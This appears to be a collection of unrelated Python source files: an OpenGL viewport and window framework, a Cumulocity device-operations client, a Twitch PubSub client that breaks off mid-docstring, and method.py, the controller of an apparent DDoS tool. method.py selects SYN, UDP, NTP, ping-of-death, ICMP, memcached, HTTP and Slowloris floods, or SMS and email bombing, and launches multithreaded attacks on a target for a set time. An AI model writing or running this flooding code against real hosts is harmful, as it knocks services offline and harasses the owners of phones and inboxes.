ploc = se3.apply(se3.inv(self.camera.matrix()),pt)
if clip:
if -ploc[2] <= self.clippingplanes[0] or -ploc[2] >= self.clippingplanes[1]:
return None
if abs(ploc[2]) < 1e-8:
return (self.x+self.w/2,self.y+self.h/2)
#d = (u*scale,v*scale,-1.0)
#ploc.x = ploc.z*d.x
#ploc.y = ploc.z*d.y
aspect = float(self.w)/float(self.h)
rfov = self.fov*math.pi/180.0
scale = 2.0*math.tan(rfov*0.5/aspect)*aspect
u = -ploc[0]/(ploc[2]*scale)
v = -ploc[1]/(ploc[2]*scale)
if clip and (abs(u) > 0.5 or abs(v) > 0.5):
return None
x = u*self.w + (self.x + self.w/2)
y = (self.y + self.h/2) - v*self.w
return (x,y,-ploc[2])
def setCurrentGL(self):
"""Sets up the view in the current OpenGL context"""
# Projection
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
aspect = float(self.w)/float(self.h)
n,f = self.clippingplanes
if self.camera.dist*1.05 > f:
#allow super zoomed-out views to work without adjusting far plane
f = self.camera.dist*1.05
gluPerspective (self.fov/aspect,aspect,n,f)
# Initialize ModelView matrix
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
# View transformation
mat = se3.homogeneous(se3.inv(self.camera.matrix()))
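# glMultMatrixf expects column-major order, so transpose the row-major homogeneous
# matrix and flatten it column by column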
cols = zip(*mat)
pack = sum((list(c) for c in cols),[])
glMultMatrixf(pack)
class GLProgramAction:
def __init__(self,hook,short_text,key,description=None):
self.hook = hook
self.short_text = short_text
self.key = key
self.description = description
if description == None:
self.description = short_text
class GLProgram:
"""A basic OpenGL visualization, run as part of some _GLBackend.
For the most part there is a one-to-one correspondence and the
backend just relays the input / drawing messages
Assumes that glinit.py has been imported to define _GLBackend.
Attributes:
name (str): title of the window (only has an effect before calling
run())
window: the QtBackend or GLUTBackend instance
view (GLViewport): describes the OpenGL viewport. If this is provided to an
empty _GLBackend window, the w,h gives a hint to the size of the window.
It is then updated by the user and setting the viewport size has no effect on the window.
clearColor (list of 4 floats): the RGBA floating point values of the background color.
actions (list of GLProgramAction): the list of actions. Must be populated using
add_action before init().
"""
def __init__(self,name="OpenGL Program"):
global _GLBackend
self.window = None
self.name = name
self.view = GLViewport()
self.clearColor = [1.0,1.0,1.0,0.0]
self.actions = []
def add_action(self,hook,short_text,key,description=None):
"""Defines a new generic GUI action. The action will be available in a menu in
Qt or as keyboard commands in GLUT."""
self.actions.append(GLProgramAction(hook,short_text,key,description))
def run(self):
"""Starts a new event loop with this object as the main program.
Note: might not return, in the case of GLUT.
"""
import visualization
visualization.setWindowTitle(self.name)
visualization.run(self)
def initialize(self):
"""Called after the GL context is initialized, but before main loop.
May be overridden. Users should not call this directly!"""
assert self.window != None
for a in self.actions:
self.window.add_action(a.hook,a.short_text,a.key,a.description)
return True
def refresh(self):
"""Call this to redraw the screen on the next event loop"""
self.window.refresh()
def modifiers(self):
"""Retrieves a list of currently pressed keyboard modifiers.
Values can be any combination of 'ctrl', 'shift', 'alt'.
"""
return self.window.modifiers()
def reshape(self,w,h):
"""Asks to resize the GL window"""
if self.window:
return self.window.reshape(w,h)
else:
self.view.w,self.view.h = w,h
def reshapefunc(self,w,h):
"""Called on window resize. May be overridden."""
self.view.w = w
self.view.h = h
self.refresh()
return True
def print_help(self):
#Put your help printouts here
print "************** Help **************"
print "?: print this help message"
for a in self.actions:
print a.key,":",a.description
print "**********************************"
def keyboardfunc(self,c,x,y):
"""Called on keypress down. May be overridden. c is either the ASCII/unicode
character of the key pressed or a string describing the character (up,down,left,right,
home,end,delete,enter,f1,...,f12)"""
if c == '?':
self.print_help()
return True
if 'alt' in self.modifiers():
c = 'Alt+'+c
if 'ctrl' in self.modifiers():
c = 'Ctrl+'+c
for a in self.actions:
if c == a.key:
a.hook()
self.refresh()
return True
return False
def keyboardupfunc(self,c,x,y):
"""Called on keyboard up (if your system allows it). May be overridden."""
return False
def motionfunc(self,x,y,dx,dy):
"""Called when the mouse moves on screen. May be overridden."""
return False
def mousefunc(self,button,state,x,y):
"""Called when the mouse is clicked. May be overridden."""
return False
def displayfunc(self):
"""All OpenGL calls go here. May be overridden, although you
may wish to override display() and display_screen() instead."""
if self.view.w == 0 or self.view.h == 0:
#hidden?
print "GLProgram.displayfunc called on hidden window?"
return False
self.prepare_GL()
self.display()
self.prepare_screen_GL()
self.display_screen()
return True
def idlefunc(self):
"""Called on idle. Default value stops all additional idle calls. Must be
overridden if you want to do something in the idle loop."""
#print "Sleeping idle from",self.__class__.__name__
self.idlesleep()
def idlesleep(self,duration=float('inf')):
"""Sleeps the idle callback for t seconds. If t is not provided,
the idle callback is slept forever"""
self.window.idlesleep(duration)
def prepare_GL(self):
"""Prepare drawing in world coordinate frame
"""
# Viewport
view = self.view
ydevice = (self.window.height - view.y - view.h)
glViewport(view.x*view.screenDeviceScale,ydevice*view.screenDeviceScale,view.w*view.screenDeviceScale,view.h*view.screenDeviceScale)
# Initialize
glClearColor(*self.clearColor)
glScissor(view.x*view.screenDeviceScale,ydevice*view.screenDeviceScale,view.w*view.screenDeviceScale,view.h*view.screenDeviceScale)
glEnable(GL_SCISSOR_TEST);
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);
glEnable(GL_DEPTH_TEST)
glEnable(GL_LIGHTING)
glEnable(GL_NORMALIZE)
glShadeModel(GL_FLAT)
def prepare_screen_GL(self):
"""Prepare drawing on screen
"""
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0,self.view.w*self.view.screenDeviceScale,self.view.h*self.view.screenDeviceScale,0,-1,1);
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
def display(self):
"""Do drawing of objects in world"""
return True
def display_screen(self):
"""Do drawing of objects on screen"""
return True
def closefunc(self):
"""Called by the window when it is closed"""
return True
def save_screen(self,fn,multithreaded=True):
"""Saves a screenshot"""
try:
from PIL import Image
except ImportError:
try:
import Image
except ImportError:
print "Cannot save screens to disk, the Python Imaging Library is not installed"
return
if hasattr(self.window,'makeCurrent'):
self.window.makeCurrent()
glReadBuffer(GL_FRONT);
x,y,w,h = self.view.x*self.view.screenDeviceScale,self.view.y*self.view.screenDeviceScale,self.view.w*self.view.screenDeviceScale,self.view.h*self.view.screenDeviceScale
screenshot = glReadPixels( x, y, w, h, GL_RGBA, GL_UNSIGNED_BYTE)
im = Image.frombuffer("RGBA", (w, h), screenshot, "raw", "RGBA", 0, 0)
print "Saving screen to",fn
if not multithreaded:
im.save(fn)
else:
import threading
def func(im,fn):
im.save(fn)
th = threading.Thread(target=func,args=(im,fn))
th.start()
def draw_text(self,point,text,size=12,color=None):
self.window.draw_text(point,text,size,color)
class GLNavigationProgram(GLProgram):
"""A more advanced form of GLProgram that allows you to navigate a
camera around a 3D world. Click-drag rotates, Control-drag translates,
Shift-drag zooms.
"""
def __init__(self,name):
GLProgram.__init__(self,name)
#mouse state information
self.dragging = False
self.clearColor = [0.8,0.8,0.9,0]
def get_view(self):
"""Returns a GLViewport describing the viewport, which could be saved to
file."""
return self.view
def set_view(self,v):
"""Sets the viewport to a tuple previously returned by get_view(),
e.g. a prior view that was saved to file."""
self.view = v
self.reshape(self.view.w,self.view.h)
def prepare_GL(self):
GLProgram.prepare_GL(self)
self.view.setCurrentGL()
# Default light source
glLightfv(GL_LIGHT0,GL_POSITION,[0,-1,2,0])
glLightfv(GL_LIGHT0,GL_DIFFUSE,[1,1,1,1])
glLightfv(GL_LIGHT0,GL_SPECULAR,[1,1,1,1])
glEnable(GL_LIGHT0)
glLightfv(GL_LIGHT1,GL_POSITION,[-1,2,1,0])
glLightfv(GL_LIGHT1,GL_DIFFUSE,[0.5,0.5,0.5,1])
glLightfv(GL_LIGHT1,GL_SPECULAR,[0.5,0.5,0.5,1])
glEnable(GL_LIGHT1)
def motionfunc(self,x,y,dx,dy):
if self.dragging:
if 'ctrl' in self.modifiers():
R,t = self.view.camera.matrix()
aspect = float(self.view.w)/self.view.h
rfov = self.view.fov*math.pi/180.0
scale = 2.0*math.tan(rfov*0.5/aspect)*aspect
delta = so3.apply(R,[-scale*float(dx)*self.view.camera.dist/self.view.w,scale*float(dy)*self.view.camera.dist/self.view.w,0])
self.view.camera.tgt = vectorops.add(self.view.camera.tgt,delta)
elif 'shift' in self.modifiers():
self.view.camera.dist *= math.exp(dy*0.01)
else:
self.view.camera.rot[2] -= float(dx)*0.01
self.view.camera.rot[1] -= float(dy)*0.01
self.refresh()
return True
return False
def mousefunc(self,button,state,x,y):
if button == 0:
if state == 0:
self.dragging = True
else:
self.dragging = False
return True
return False
class GLRealtimeProgram(GLNavigationProgram):
"""A GLNavigationProgram that refreshes the screen at a given frame rate.
Attributes:
ttotal (float): total elapsed time assuming a constant frame rate
fps (float): the frame rate in Hz
dt (float): 1.0/fps
counter (int): a frame counter
lasttime (float): time.time() value on the last frame.
"""
def __init__(self,name):
GLNavigationProgram.__init__(self,name)
self.ttotal = 0.0
self.fps = 50
self.dt = 1.0/self.fps
self.counter = 0
self.lasttime = time.time()
# idle callback
def idlefunc (self):
tcur = time.time()
tsleep = self.dt - (tcur - self.lasttime)
if tsleep > 0.001:
#print "Elapsed time",tcur-self.lasttime,"sleep",tsleep,"window",self.window.name
self.idlesleep(tsleep)
return
self.ttotal += self.dt
self.counter += 1
#call the user-defined idle function
self.idle()
self.lasttime = tcur
self.refresh()
return True
def idle(self):
"""Overload me"""
pass
class GLPluginProgram(GLRealtimeProgram):
"""This base class should be used with a GLPluginBase object to handle the
GUI functionality (see glcommon.py). Call setPlugin() on this object to set
the currently used plugin. pushPlugin()/popPlugin() can also be used to
set a hierarchy of plugins."""
def __init__(self,name="GLWidget"):
GLRealtimeProgram.__init__(self,name)
self.plugins = []
def setPlugin(self,plugin):
import copy
for p in self.plugins:
p.window = None
p.view = copy.copy(p.view)
self.plugins = []
if plugin:
self.pushPlugin(plugin)
def pushPlugin(self,plugin):
self.plugins.append(plugin)
plugin.window = self.window
if self.window:
if self.window.initialized:
print "GLPluginProgram.pushPlugin called after window was initialized, some actions may not be available"
plugin.view = self.view
plugin.reshapefunc(self.view.w,self.view.h)
self.refresh()
elif len(self.plugins) == 1 and hasattr(plugin,'view') and plugin.view != None:
self.view = plugin.view
else:
plugin.view = self.view
def popPlugin(self):
if len(self.plugins)==0: return None
res = self.plugins[-1]
self.plugins.pop(-1)
res.window = None
if self.window:
self.refresh()
return res
def set_view(self,v):
GLRealtimeProgram.set_view(self,v)
for p in self.plugins:
p.view = self.view
def initialize(self):
#print "GLPluginProgram initialize:",len(self.plugins),"plugins"
for plugin in self.plugins:
plugin.window = self.window
if not plugin.initialize():
print "GLPluginProgram.initialize(): Plugin of type",plugin.__class__.__name__,"Did not initialize"
return False
if hasattr(plugin,'actions'):
#print "Adding",len(plugin.actions),"actions for plugin",plugin.__class__.__name__
for a in plugin.actions:
self.add_action(*a)
return GLRealtimeProgram.initialize(self)
def idle(self):
anyhandled = False
for plugin in self.plugins:
if hasattr(plugin,'idle') and plugin.idle():
anyhandled = True
if not anyhandled:
return False
return True
def reshapefunc(self,w,h):
GLRealtimeProgram.reshapefunc(self,w,h)
for plugin in self.plugins:
plugin.reshapefunc(w,h)
return
def keyboardfunc(self,c,x,y):
for plugin in self.plugins[::-1]:
if plugin.keyboardfunc(c,x,y): return True
return GLRealtimeProgram.keyboardfunc(self,c,x,y)
def keyboardupfunc(self,c,x,y):
for plugin in self.plugins[::-1]:
if plugin.keyboardupfunc(c,x,y): return True
return GLRealtimeProgram.keyboardupfunc(self,c,x,y)
def motionfunc(self,x,y,dx,dy):
for plugin in self.plugins[::-1]:
if plugin.motionfunc(x,y,dx,dy): return True
return GLRealtimeProgram.motionfunc(self,x,y,dx,dy)
def mousefunc(self,button,state,x,y):
for plugin in self.plugins[::-1]:
if plugin.mousefunc(button,state,x,y): return True
return GLRealtimeProgram.mousefunc(self,button,state,x,y)
def displayfunc(self):
for plugin in self.plugins[::-1]:
if plugin.displayfunc():
break
GLRealtimeProgram.displayfunc(self)
def display(self):
for plugin in self.plugins:
if plugin.display(): return True
return GLRealtimeProgram.display(self)
def display_screen(self):
for plugin in self.plugins:
if plugin.display_screen(): return True
return GLRealtimeProgram.display_screen(self)
|
method.py
|
from time import time, sleep
from threading import Thread
from colorama import Fore
from humanfriendly import format_timespan, Spinner
from tools.crash import CriticalError
from tools.ipTools import GetTargetAddress, InternetConnectionCheck
""" Find & import ddos method """
def GetMethodByName(method):
if method == "SMS":
dir = "tools.SMS.main"
elif method == "EMAIL":
dir = "tools.EMAIL.main"
elif method in ("SYN", "UDP", "NTP", "POD", "ICMP", "MEMCACHED"):
dir = f"tools.L4.{method.lower()}"
elif method in ("HTTP", "SLOWLORIS"):
dir = f"tools.L7.{method.lower()}"
else:
raise SystemExit(
f"{Fore.RED}[!] {Fore.MAGENTA}Unknown ddos method {repr(method)} selected..{Fore.RESET}"
)
module = __import__(dir, fromlist=["object"])
if hasattr(module, "flood"):
method = getattr(module, "flood")
return method
else:
CriticalError(
f"Method 'flood' not found in {repr(dir)}. Please use python 3", "-"
)
""" Class to control attack methods """
class AttackMethod:
# Constructor
def __init__(self, name, duration, threads, target):
self.name = name
self.duration = duration
self.threads_count = threads
self.target_name = target
self.target = target
self.threads = []
self.is_running = False
# Enter
def __enter__(self):
InternetConnectionCheck()
self.method = GetMethodByName(self.name)
self.target = GetTargetAddress(self.target_name, self.name)
return self
# Exit
def __exit__(self, exc_type, exc_val, exc_tb):
print(f"{Fore.MAGENTA}[!] {Fore.BLUE}Attack completed!{Fore.RESET}")
# Run time checker
def __RunTimer(self):
__stopTime = time() + self.duration
while time() < __stopTime:
if not self.is_running:
return
sleep(1)
self.is_running = False
# Run flooder
def __RunFlood(self):
while self.is_running:
self.method(self.target)
# Start threads
def __RunThreads(self):
# Run timer thread
thread = Thread(target=self.__RunTimer)
thread.start()
# The EMAIL method only needs a single thread
if self.name == "EMAIL":
self.threads_count = 1
# Create flood threads
for _ in range(self.threads_count):
thread = Thread(target=self.__RunFlood)
self.threads.append(thread)
# Start flood threads
with Spinner(
label=f"{Fore.YELLOW}Starting {self.threads_count} threads{Fore.RESET}",
total=100,
) as spinner:
for index, thread in enumerate(self.threads):
thread.start()
spinner.step(100 / len(self.threads) * (index + 1))
# Wait for flood threads to stop
for index, thread in enumerate(self.threads):
thread.join()
print(
f"{Fore.GREEN}[+] {Fore.YELLOW}Stopped thread {index + 1}.{Fore.RESET}"
)
# Start ddos attack
def Start(self):
if self.name == "EMAIL":
target = self.target_name
else:
target = str(self.target).strip("()").replace(", ", ":").replace("'", "")
duration = format_timespan(self.duration)
print(
f"{Fore.MAGENTA}[?] {Fore.BLUE}Starting attack to {target} using method {self.name}.{Fore.RESET}\n"
f"{Fore.MAGENTA}[?] {Fore.BLUE}Attack will be stopped after {Fore.MAGENTA}{duration}{Fore.BLUE}.{Fore.RESET}"
)
self.is_running = True
try:
self.__RunThreads()
except KeyboardInterrupt:
self.is_running = False
print(
f"\n{Fore.RED}[!] {Fore.MAGENTA}Ctrl+C Detected. Stopping {self.threads_count} threads..{Fore.RESET}"
)
# Wait for all threads to stop
for thread in self.threads:
thread.join()
except Exception as err:
print(err)
|
operations.py
|
import requests
import logging
import json
import API.authentication as auth
import deviceControl.operationsHandler
import threading
logger = logging.getLogger('Operations API')
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger.info('Logger for operations was initialised')
def setOperationMode(operationID, status, text = ''):
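# Updates the status of a Cumulocity operation via a PUT request; for FAILED operations
# the failureReason text is included in the payload.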
try:
mode = status
url = "https://%s/devicecontrol/operations/%s"%(auth.get().tenant, operationID)
if mode in ('EXECUTING', 'SUCCESSFUL', 'FAILED'):
logger.info('Operation ' + str(mode))
data = {}
data['status'] = str(status)
if mode == 'FAILED':
data['failureReason'] = str(text)
response = requests.request("PUT", url, headers=auth.get().headers, data = json.dumps(data))
else:
logger.error('Mode not known')
return False
logger.info('Response from request with code : ' + str(response.status_code))
if response.status_code == 200:
logger.info('Operation successfully set to %s' % str(status))
return True
else:
logger.error('Operation could not be set to %s' % str(status))
return False
except Exception as e:
logger.error('The following error occurred: %s' % (str(e)))
def getPendingOperations(internalID):
try:
url = "https://%s/devicecontrol/operations?status=PENDING&deviceId=%s"%(auth.get().tenant, internalID)
response = requests.request("GET", url, headers=auth.get().headers, data = auth.get().payload)
logger.info('Response from request: ' + str(response.text))
logger.info('Response from request with code : ' + str(response.status_code))
if response.status_code == 200:
logger.info('Valid request')
json_data = json.loads(response.text)
logger.debug('Json response: %s'%(str(json_data)))
logger.info('Checking if operations is not empty')
if not json_data['operations']:
logger.debug('Operations is empty, returns False')
return False
logger.info('Operation is not empty')
logger.debug('Looping through operations')
for operation in json_data['operations']:
logger.debug('Current item: %s'%(str(operation)))
operationsHandlerThread = threading.Thread(target=deviceControl.operationsHandler.start, kwargs=dict(internalID=auth.get().internalID,operation=operation ), daemon=True)
operationsHandlerThread.start()
else:
logger.warning('Got response with status_code: ' + str(response.status_code))
return False
except Exception as e:
logger.error('The following error occurred: %s' % (str(e)))
|
pubsub.py
|
# Copyright (c) 2020. Lena "Teekeks" During <info@teawork.de>
"""
PubSub client
-------------
This is a full implementation of the PubSub API of twitch.
PubSub enables you to subscribe to a topic and receive updates (e.g., when a user cheers in a channel).
Read more about it on `the Twitch API Documentation <https://dev.twitch.tv/docs/pubsub>`__.
.. note:: You **always** need User Authentication while using this!
*******************
Short code example:
*******************
.. code-block:: python
from twitchAPI.pubsub import PubSub
from twitchAPI.twitch import Twitch
from twitchAPI.types import AuthScope
from pprint import pprint
from uuid import UUID
def callback_whisper(uuid: UUID, data: dict) -> None:
print('got callback for UUID ' + str(uuid))
pprint(data)
# setting up Authentication and getting your user id
twitch = Twitch('my_app_id', 'my_app_secret')
twitch.authenticate_app([])
# you can get your user auth token and user auth refresh token following the example in twitchAPI.oauth
twitch.set_user_authentication('my_user_auth_token', [AuthScope.WHISPERS_READ], 'my_user_auth_refresh_token')
user_id = twitch.get_users(logins=['my_username'])['data'][0]['id']
# starting up PubSub
pubsub = PubSub(twitch)
pubsub.start()
# you can either start listening before or after you started pubsub.
uuid = pubsub.listen_whispers(user_id, callback_whisper)
input('press ENTER to close...')
# you do not need to unlisten to topics before stopping but you can listen and unlisten at any moment you want
pubsub.unlisten(uuid)
pubsub.stop()
********************
Class Documentation:
********************
"""
from .twitch import Twitch
from .types import *
from .helper import get_uuid, make_enum, TWITCH_PUB_SUB_URL
import asyncio
import websockets
import threading
import json
from random import randrange
import datetime
from logging import getLogger, Logger
from typing import Callable, List, Dict
from uuid import UUID
from time import sleep
class PubSub:
"""The PubSub client
:var int ping_frequency: how frequently, in seconds, a ping command is sent.
You probably don't want to change this.
This should never be shorter than 12 + `ping_jitter` seconds to avoid problems
with the pong timeout.
|default| :code:`120`
:var int ping_jitter: time in seconds added or subtracted from `ping_frequency`.
You probably don't want to change this.
|default| :code:`4`
:var int listen_confirm_timeout: maximum time in seconds waited for a listen confirm.
|default| :code:`30`
"""
ping_frequency: int = 120
ping_jitter: int = 4
listen_confirm_timeout: int = 30
reconnect_delay_steps: List[int] = [1, 2, 4, 8, 16, 32, 64, 128]
__twitch: Twitch = None
__connection = None
__socket_thread: threading.Thread = None
__running: bool = False
__socket_loop = None
__topics: dict = {}
__startup_complete: bool = False
__tasks = None
__waiting_for_pong: bool = False
__logger: Logger = None
__nonce_waiting_confirm: dict = {}
def __init__(self, twitch: Twitch):
self.__twitch = twitch
self.__logger = getLogger('twitchAPI.pubsub')
def start(self) -> None:
"""
Start the PubSub Client
:raises RuntimeError: if already started
"""
if self.__running:
raise RuntimeError('already started')
self.__startup_complete = False
self.__socket_thread = threading.Thread(target=self.__run_socket)
self.__running = True
self.__socket_thread.start()
while not self.__startup_complete:
sleep(0.01)
def stop(self) -> None:
"""
Stop the PubSub Client
:raises RuntimeError: if the client is not running
"""
if not self.__running:
raise RuntimeError('not running')
self.__startup_complete = False
self.__running = False
for task in self.__tasks:
task.cancel()
self.__socket_loop.call_soon_threadsafe(self.__socket_loop.stop)
self.__socket_thread.join()
###########################################################################################
# Internal
###########################################################################################
async def __connect(self, is_startup=False):
if self.__connection is not None and self.__connection.open:
await self.__connection.close()
retry = 0
need_retry = True
while need_retry and retry < len(self.reconnect_delay_steps):
need_retry = False
try:
self.__connection = await websockets.connect(TWITCH_PUB_SUB_URL, loop=self.__socket_loop)
except websockets.InvalidHandshake:
self.__logger.warning(f'connection attempt failed, retry in {self.reconnect_delay_steps[retry]}s...')
await asyncio.sleep(self.reconnect_delay_steps[retry])
retry += 1
need_retry = True
if retry >= len(self.reconnect_delay_steps):
raise TwitchBackendException("can't connect")
if self.__connection.open and not is_startup:
uuid = str(get_uuid())
await self.__send_listen(uuid, list(self.__topics.keys()))
async def __send_listen(self, nonce: str, topics: List[str], subscribe: bool = True):
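# Builds a LISTEN/UNLISTEN message for the given topics, records the nonce, sends the
# message, then polls until the matching RESPONSE arrives or listen_confirm_timeout
# expires, raising the appropriate exception on error.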
listen_msg = {
'type': 'LISTEN' if subscribe else 'UNLISTEN',
'nonce': nonce,
'data': {
'topics': topics,
'auth_token': self.__twitch.get_user_auth_token()
}
}
self.__nonce_waiting_confirm[nonce] = {'received': False,
'error': PubSubResponseError.NONE}
timeout = datetime.datetime.utcnow() + datetime.timedelta(seconds=self.listen_confirm_timeout)
confirmed = False
self.__logger.debug(f'sending {"" if subscribe else "un"}listen for topics {str(topics)} with nonce {nonce}')
await self.__send_message(listen_msg)
# wait for confirm
while not confirmed and datetime.datetime.utcnow() < timeout:
await asyncio.sleep(0.01)
confirmed = self.__nonce_waiting_confirm[nonce]['received']
if not confirmed:
raise PubSubListenTimeoutException()
else:
error = self.__nonce_waiting_confirm[nonce]['error']
if error is not PubSubResponseError.NONE:
if error is PubSubResponseError.BAD_AUTH:
raise TwitchAuthorizationException()
if error is PubSubResponseError.SERVER:
raise TwitchBackendException()
raise TwitchAPIException(error)
async def __send_message(self, msg_data):
await self.__connection.send(json.dumps(msg_data))
def __run_socket(self):
self.__socket_loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.__socket_loop)
# startup
self.__socket_loop.run_until_complete(self.__connect(is_startup=True))
self.__tasks = [
asyncio.ensure_future(self.__task_heartbeat(), loop=self.__socket_loop),
asyncio.ensure_future(self.__task_receive(), loop=self.__socket_loop),
asyncio.ensure_future(self.__task_initial_listen(), loop=self.__socket_loop)
]
try:
self.__socket_loop.run_forever()
except asyncio.CancelledError:
pass
if self.__connection.open:
self.__socket_loop.run_until_complete(self.__connection.close())
def __generic_listen(self, key, callback_func, required_scopes: List[AuthScope]) -> UUID:
for scope in required_scopes:
if scope not in self.__twitch.get_user_auth_scope():
raise MissingScopeException(str(scope))
uuid = get_uuid()
if key not in self.__topics.keys():
self.__topics[key] = {'subs': {}}
self.__topics[key]['subs'][uuid] = callback_func
if self.__startup_complete:
asyncio.get_event_loop().run_until_complete(self.__send_listen(str(uuid), [key]))
return uuid
###########################################################################################
# Asyncio Tasks
###########################################################################################
async def __task_initial_listen(self):
self.__startup_complete = True
if len(list(self.__topics.keys())) > 0:
uuid = str(get_uuid())
await self.__send_listen(uuid, list(self.__topics.keys()))
async def __task_heartbeat(self):
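# Sends a PING roughly every ping_frequency (+/- ping_jitter) seconds; if no PONG
# arrives within 10 seconds the connection is re-established.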
while True:
next_heartbeat = datetime.datetime.utcnow() + \
datetime.timedelta(seconds=randrange(self.ping_frequency - self.ping_jitter,
self.ping_frequency + self.ping_jitter,
1))
while datetime.datetime.utcnow() < next_heartbeat:
await asyncio.sleep(1)
self.__logger.debug('send ping...')
pong_timeout = datetime.datetime.utcnow() + datetime.timedelta(seconds=10)
self.__waiting_for_pong = True
await self.__send_message({'type': 'PING'})
while self.__waiting_for_pong:
if datetime.datetime.utcnow() > pong_timeout:
self.__logger.info('did not receive pong in time, reconnecting...')
await self.__connect()
self.__waiting_for_pong = False
await asyncio.sleep(1)
async def __task_receive(self):
async for message in self.__connection:
data = json.loads(message)
switcher: Dict[str, Callable] = {
'pong': self.__handle_pong,
'reconnect': self.__handle_reconnect,
'response': self.__handle_response,
'message': self.__handle_message
}
handler = switcher.get(data.get('type', '').lower(),
self.__handle_unknown)
self.__socket_loop.create_task(handler(data))
###########################################################################################
# Handler
###########################################################################################
async def __handle_pong(self, data):
self.__waiting_for_pong = False
self.__logger.debug('received pong')
async def __handle_reconnect(self, data):
self.__logger.info('received reconnect command, reconnecting now...')
await self.__connect()
async def __handle_response(self, data):
error = make_enum(data.get('error'),
PubSubResponseError,
PubSubResponseError.UNKNOWN)
self.__logger.debug(f'got response for nonce {data.get("nonce")}: {str(error)}')
self.__nonce_waiting_confirm[data.get('nonce')]['error'] = error
self.__nonce_waiting_confirm[data.get('nonce')]['received'] = True
async def __handle_message(self, data):
topic_data = self.__topics.get(data.get('data', {}).get('topic', ''), None)
msg_data = json.loads(data.get('data', {}).get('message', '{}'))
if topic_data is not None:
for uuid, sub in topic_data.get('subs', {}).items():
sub(uuid, msg_data)
async def __handle_unknown(self, data):
self.__logger.warning('got message of unknown type: ' + str(data))
###########################################################################################
# Listener
###########################################################################################
def unlisten(self, uuid: UUID) -> None:
"""
Stop listening to a specific Topic subscription.
:param ~uuid.UUID uuid: The UUID of the subscription you want to stop listening to
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the server response is something other than expected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the unsubscription is not confirmed in the time set by
`listen_confirm_timeout`
"""
clear_topics = []
for topic, topic_data in self.__topics.items():
if uuid in topic_data['subs'].keys():
topic_data['subs'].pop(uuid)
if len(topic_data['subs'].keys()) == 0:
clear_topics.append(topic)
if self.__startup_complete and len(clear_topics) > 0:
asyncio.get_event_loop().run_until_complete(self.__send_listen(str(uuid), clear_topics, subscribe=False))
if len(clear_topics) > 0:
for topic in clear_topics:
self.__topics.pop(topic)
def listen_whispers(self,
user_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
You are notified when anyone whispers the specified user or the specified user whispers to anyone.\n
Requires the :const:`twitchAPI.types.AuthScope.WHISPERS_READ` AuthScope.\n
:param str user_id: ID of the User
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something other than expected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'whispers.{user_id}', callback_func, [AuthScope.WHISPERS_READ])
def listen_bits_v1(self,
channel_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
You are notified when anyone cheers in the specified channel.\n
Requires the :const:`twitchAPI.types.AuthScope.BITS_READ` AuthScope.\n
:param str channel_id: ID of the Channel
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something other than expected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'channel-bits-events-v1.{channel_id}', callback_func, [AuthScope.BITS_READ])
def listen_bits(self,
channel_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
You are notified when anyone cheers in the specified channel.\n
Requires the :const:`twitchAPI.types.AuthScope.BITS_READ` AuthScope.\n
:param str channel_id: ID of the Channel
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something other than expected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'channel-bits-events-v2.{channel_id}', callback_func, [AuthScope.BITS_READ])
def listen_bits_badge_notification(self,
channel_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
You are notified when a user earns a new Bits badge in the given channel,
and chooses to share the notification with chat.\n
Requires the :const:`twitchAPI.types.AuthScope.BITS_READ` AuthScope.\n
:param str channel_id: ID of the Channel
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something other than expected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'channel-bits-badge-unlocks.{channel_id}', callback_func, [AuthScope.BITS_READ])
def listen_channel_points(self,
channel_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
You are notified when a custom reward is redeemed in the channel.\n
